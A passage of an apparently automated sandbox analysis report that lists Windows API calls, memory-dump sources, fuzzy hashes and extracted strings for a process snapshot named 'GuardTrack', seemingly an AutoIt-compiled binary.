                                                          • Opcode Fuzzy Hash: 9cfe3516401655a2714bdad5a594d01bf9b0d79d37eff499c913422f8c111d00
                                                          • Instruction Fuzzy Hash: CCF05E35005269BAEB226F54AC0DFDE3F9BAF06721F049000FB55611E2C7B46661DBE9
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0060AA6F
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0060AA82
                                                          • GetCurrentThreadId.KERNEL32 ref: 0060AA89
                                                          • AttachThreadInput.USER32(00000000), ref: 0060AA90
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          • Opcode ID: 815b513f7e6933cf7899772d151f1f289336f76e92305558d90d37b5abd4e293
                                                          • Instruction ID: 1d8eaa3ff56f5530cc56a68fb2d0f95610cdd9236013ac0c6764e126277a56db
                                                          • Opcode Fuzzy Hash: 815b513f7e6933cf7899772d151f1f289336f76e92305558d90d37b5abd4e293
                                                          • Instruction Fuzzy Hash: 88E0C935685328BAEB215FA29D0DEEB7F5EEF167A1F009015FA0A95090C6718550CBA1
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 005B260D
                                                          • SetTextColor.GDI32(?,000000FF), ref: 005B2617
                                                          • SetBkMode.GDI32(?,00000001), ref: 005B262C
                                                          • GetStockObject.GDI32(00000005), ref: 005B2634
                                                          • GetWindowDC.USER32(?,00000000), ref: 005EC1C4
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 005EC1D1
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 005EC1EA
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 005EC203
                                                          • GetPixel.GDI32(00000000,?,?), ref: 005EC223
                                                          • ReleaseDC.USER32(?,00000000), ref: 005EC22E
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          • Opcode ID: c6e7edc179bef6c3e0dba8afbc81efd3d25f00fc89aa8bb0c98900c82d981552
                                                          • Instruction ID: 2a839fdf1d257b16095e0d35efa8e360cfe0dd83335b93dd93db935f42068c42
                                                          • Opcode Fuzzy Hash: c6e7edc179bef6c3e0dba8afbc81efd3d25f00fc89aa8bb0c98900c82d981552
                                                          • Instruction Fuzzy Hash: B3E06535504284BBEB255FA4AC097D83F12FB16331F048366FBA9580E187714580DB11
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 00609339
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00608F04), ref: 00609340
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00608F04), ref: 0060934D
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00608F04), ref: 00609354
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: 04d8a1a1323399c11c76499c0ec93b162e10e89a0fbe18f5beb4935f19529a20
                                                          • Instruction ID: dced0cfb5894db16e6e8081103cc6d1636d94e328c9fcb8fc2c186d6b15bd80b
                                                          • Opcode Fuzzy Hash: 04d8a1a1323399c11c76499c0ec93b162e10e89a0fbe18f5beb4935f19529a20
                                                          • Instruction Fuzzy Hash: FBE0863A6412319FE7241FF15D0DF973BAEEF56791F108818B745C90D0E6349444CB60
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 005F0679
                                                          • GetDC.USER32(00000000), ref: 005F0683
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005F06A3
                                                          • ReleaseDC.USER32(?), ref: 005F06C4
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: e9f7a9c0172e2e7e345e0ee35be0893593d111148e8ba3bbdea8703b646581c5
                                                          • Instruction ID: 8b97c78984a6f98ceed11cfec91723a6d2030f4f9d457d56a754f057dc9e9f95
                                                          • Opcode Fuzzy Hash: e9f7a9c0172e2e7e345e0ee35be0893593d111148e8ba3bbdea8703b646581c5
                                                          • Instruction Fuzzy Hash: D9E0E579800214EFEB019F60D808AAD7FB2FB8C310F129409FE5AA7250DB3895519F50
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 005F068D
                                                          • GetDC.USER32(00000000), ref: 005F0697
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005F06A3
                                                          • ReleaseDC.USER32(?), ref: 005F06C4
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: c32bb3851b20c4be9f1dcaa61a9e9f2395b0f5817ae20ed0d286876ff4e0b2bf
                                                          • Instruction ID: 9e080d91d300ce0082a45ca60623b2f9683679f220dc498e8f964500f536f932
                                                          • Opcode Fuzzy Hash: c32bb3851b20c4be9f1dcaa61a9e9f2395b0f5817ae20ed0d286876ff4e0b2bf
                                                          • Instruction Fuzzy Hash: FDE012B9800214AFEB11AFA0D808A9D7FF2FF8C310F128408FE5AA7210DB38A5518F50
                                                          APIs
                                                          • __getptd_noexit.LIBCMT ref: 005D5FCD
                                                            • Part of subcall function 005D9BF4: GetLastError.KERNEL32(?,005D1003,005D8D5D,005D59C3,?,?,005D1003,?,0000FFFF), ref: 005D9BF6
                                                            • Part of subcall function 005D9BF4: __calloc_crt.LIBCMT ref: 005D9C17
                                                            • Part of subcall function 005D9BF4: __initptd.LIBCMT ref: 005D9C39
                                                            • Part of subcall function 005D9BF4: GetCurrentThreadId.KERNEL32 ref: 005D9C40
                                                            • Part of subcall function 005D9BF4: SetLastError.KERNEL32(00000000,005D1003,005D8D5D,005D59C3,?,?,005D1003,?,0000FFFF), ref: 005D9C58
                                                          • CloseHandle.KERNEL32(?,?,005D5FAC), ref: 005D5FE1
                                                          • __freeptd.LIBCMT ref: 005D5FE8
                                                          • ExitThread.KERNEL32 ref: 005D5FF0
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                          • String ID:
                                                          • API String ID: 4169687693-0
                                                          • Opcode ID: a0a062de5142534f520ef495620e6ddb82bc076b4b19294618d376423c5fbd59
                                                          • Instruction ID: daa07aaa28a74db58789454fc7af50c46d7d89e136a5361798ee1e510f795813
                                                          • Opcode Fuzzy Hash: a0a062de5142534f520ef495620e6ddb82bc076b4b19294618d376423c5fbd59
                                                          • Instruction Fuzzy Hash: 5FD0A731006E63CBE3322B6CAC0DE193E117F01B21F055217F565592F09B3188028641
                                                          APIs
                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0060C057
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ContainedObject
                                                          • String ID: AutoIt3GUI$Container
                                                          • API String ID: 3565006973-3941886329
                                                          • Opcode ID: e45e2863020caa9039107b841fd12726dbfe376efed9bcf9e0ed9a1141de65d4
                                                          • Instruction ID: 7165e6dd1b0aa949b614c04e417566ea90d6db657bb817bbd294a92756badb4f
                                                          • Opcode Fuzzy Hash: e45e2863020caa9039107b841fd12726dbfe376efed9bcf9e0ed9a1141de65d4
                                                          • Instruction Fuzzy Hash: 47913970640602AFDB58DF64C884A6BBBF6FF49710F20856EE94ADB391DB71E841CB50
                                                          APIs
                                                            • Part of subcall function 005C436A: _wcscpy.LIBCMT ref: 005C438D
                                                            • Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
                                                            • Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC
                                                          • __wcsnicmp.LIBCMT ref: 0061B670
                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0061B739
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                          • String ID: LPT
                                                          • API String ID: 3222508074-1350329615
                                                          • Opcode ID: d0714d3ee7865c8fe76d7a89c96cc4eae8f546ef62799ab4371a353df36f886b
                                                          • Instruction ID: 7de4d6600fbe55786cf3046c613c0aee96ad9377789a4c45e8df2a76546015d7
                                                          • Opcode Fuzzy Hash: d0714d3ee7865c8fe76d7a89c96cc4eae8f546ef62799ab4371a353df36f886b
                                                          • Instruction Fuzzy Hash: 5A618275A00215AFCB14DF94C895EEEB7B5FF88710F14805AF546AB391D770AE81CB90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: #V\
                                                          • API String ID: 4104443479-1266075302
                                                          • Opcode ID: ed027f9915e38e1a83fee097b9050245e7fbee43dedd53881acccb065ad1e944
                                                          • Instruction ID: 76d9a06632ed8c4ed4a524dcac707350c56dc7774ba20b1f9e18c83e6082fd2f
                                                          • Opcode Fuzzy Hash: ed027f9915e38e1a83fee097b9050245e7fbee43dedd53881acccb065ad1e944
                                                          • Instruction Fuzzy Hash: F4515A70A0060DDFCF24CFA8C884ABEBBB1FF49304F14852AE95AD7240E734A955CB91
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 005BE01E
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 005BE037
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: f10b837a64ddfc2343db9cb310b50541ae6cac199e8e852abb4bb4d05e337dac
                                                          • Instruction ID: c9c652d5786c107612a7a782e71116993b74fb9c9d017871e200597e4dd99a32
                                                          • Opcode Fuzzy Hash: f10b837a64ddfc2343db9cb310b50541ae6cac199e8e852abb4bb4d05e337dac
                                                          • Instruction Fuzzy Hash: ED514A71408B499BE320AF50E88ABAFBBF8FFC4315F41484DF2D941192DB70A569CB16
                                                          APIs
                                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00638186
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0063819B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: bcb78ea752962812cf59cb077fd6cabf50e7df83ae560f12e7c6f40e05749163
                                                          • Instruction ID: 8b14f3ef383334f74721ff02dfb9d1348d9c42558a29bdb12b782d3f57cfda41
                                                          • Opcode Fuzzy Hash: bcb78ea752962812cf59cb077fd6cabf50e7df83ae560f12e7c6f40e05749163
                                                          • Instruction Fuzzy Hash: A0410874A0130A9FDB14CF64C881BDA7BB6FB09340F10016AF909AB351DB71A956CF90
                                                          APIs
                                                          • _memset.LIBCMT ref: 00622C6A
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00622CA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_memset
                                                          • String ID: |
                                                          • API String ID: 1413715105-2343686810
                                                          • Opcode ID: 935c72478176eb54576bc626790b626d672131747c5bef83799c94aad1c14e53
                                                          • Instruction ID: 4162563b71f4498532c0d77159849f1b3aba67955108bd7c195099bc1605f1e2
                                                          • Opcode Fuzzy Hash: 935c72478176eb54576bc626790b626d672131747c5bef83799c94aad1c14e53
                                                          • Instruction Fuzzy Hash: 2F311871C0051AAFCF11EFA4DC85EEEBFB9FF45304F100019F915A6262DA315916DBA4
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 0063713C
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00637178
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: 352878f6f777ece66ce60dd3408f71eb61af18ed23c07fe098d0079b27a7ef16
                                                          • Instruction ID: fcf619dd4aa226b08b118c7575e21469750f959dc7ae9f246cbd1d3927472f20
                                                          • Opcode Fuzzy Hash: 352878f6f777ece66ce60dd3408f71eb61af18ed23c07fe098d0079b27a7ef16
                                                          • Instruction Fuzzy Hash: A13184B1100604AEEB249F74CC41AFB77BAFF88724F10961DF99587191DB31AC91DBA0
                                                          APIs
                                                          • _memset.LIBCMT ref: 006130B8
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006130F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 11cf266bb986ece12d43cd1aa68f6866928a2f82d236771fe5b2cdcb40bd30b9
                                                          • Instruction ID: 5d373a01dcc2359a71ab02d7cc1ebbd6620385de019e7257ca7ba67ea624285a
                                                          • Opcode Fuzzy Hash: 11cf266bb986ece12d43cd1aa68f6866928a2f82d236771fe5b2cdcb40bd30b9
                                                          • Instruction Fuzzy Hash: 6731F731600215FBEB248F58C986BEEBBBAFF05350F1C4019E986A6390D7709B84CB50
                                                          APIs
                                                          • __snwprintf.LIBCMT ref: 00624132
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __snwprintf_memmove
                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                          • API String ID: 3506404897-2584243854
                                                          • Opcode ID: 333f03990f27a947507e9fd422489e8f242e5b05e8721db4ea7894b45d3b1294
                                                          • Instruction ID: 06f3982b2faec7567a0e8ebe167e03aee61f2f2f65b62b5a01aeb0a8fcc6b460
                                                          • Opcode Fuzzy Hash: 333f03990f27a947507e9fd422489e8f242e5b05e8721db4ea7894b45d3b1294
                                                          • Instruction Fuzzy Hash: F321B430A00629AFCF14EFA4D859EAE7BB6BF95340F040458F905A7242DB30E955CFA5
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00636D86
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00636D91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: 79203fe6d20d0f0e53d0b04148f01d91120fcb1ad4e8bd44bd24d8f3686aa98e
                                                          • Instruction ID: ea44ab66dff8bfb6ea923b5170517ad83aee01a50ce5b3b8258182aa9afbe362
                                                          • Opcode Fuzzy Hash: 79203fe6d20d0f0e53d0b04148f01d91120fcb1ad4e8bd44bd24d8f3686aa98e
                                                          • Instruction Fuzzy Hash: 1E116071310209BFEF259E54DC81EFB3B6BEF843A4F118129F9189B290D671AC5187A0
                                                          APIs
                                                            • Part of subcall function 005B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005B214F
                                                            • Part of subcall function 005B2111: GetStockObject.GDI32(00000011), ref: 005B2163
                                                            • Part of subcall function 005B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 005B216D
                                                          • GetWindowRect.USER32(00000000,?), ref: 00637296
                                                          • GetSysColor.USER32(00000012), ref: 006372B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: 4b6052583ae5bcb5c5d6bf7185b70ce75aa3b42364a6ca88730b82041073aea4
                                                          • Instruction ID: fb80487566e456eab7b25cfa0945b94a42ad4ff9f7abd4c4622ff509e01e602c
                                                          • Opcode Fuzzy Hash: 4b6052583ae5bcb5c5d6bf7185b70ce75aa3b42364a6ca88730b82041073aea4
                                                          • Instruction Fuzzy Hash: 41214772A1420AAFDB14DFA8CC45AFA7BE9EB08304F005518FE55D3250D634E851DBA0
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00636FC7
